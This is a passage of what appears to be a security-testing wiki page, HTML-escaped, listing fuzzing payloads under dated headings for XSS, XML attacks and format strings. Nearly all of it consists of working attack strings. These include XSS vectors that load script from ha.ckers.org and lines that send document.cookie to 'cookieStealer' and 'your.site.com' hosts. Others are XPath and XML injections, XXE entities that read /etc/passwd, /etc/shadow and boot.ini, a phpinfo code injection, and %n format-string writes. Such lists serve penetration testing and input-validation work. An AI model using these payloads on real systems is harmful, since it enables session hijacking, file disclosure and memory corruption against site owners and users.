&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
